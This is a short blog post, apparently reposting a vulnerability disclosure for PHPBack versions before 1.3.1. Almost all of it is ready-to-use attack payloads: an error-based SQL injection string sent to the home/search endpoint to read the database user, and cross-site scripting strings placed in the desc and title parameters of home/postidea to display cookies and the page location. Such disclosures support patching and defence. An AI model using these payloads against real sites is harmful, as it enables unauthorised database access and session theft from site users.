27 Ocak 2017 Cuma

PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting

---------------------------------------------- http://127.0.0.1/phpback-master/home/search Post data query=')%0Aor%0Aextractvalue(6678,concat(0x7e,(select%0Auser()),0x7e))--%0A%23     XSS ---- http://127.0.0.1/phpback-master/home/postidea Post data   in desc parameter desc=alert(document.cookie); in title parameter   title=">alert(document.location);



Posted via Blogaway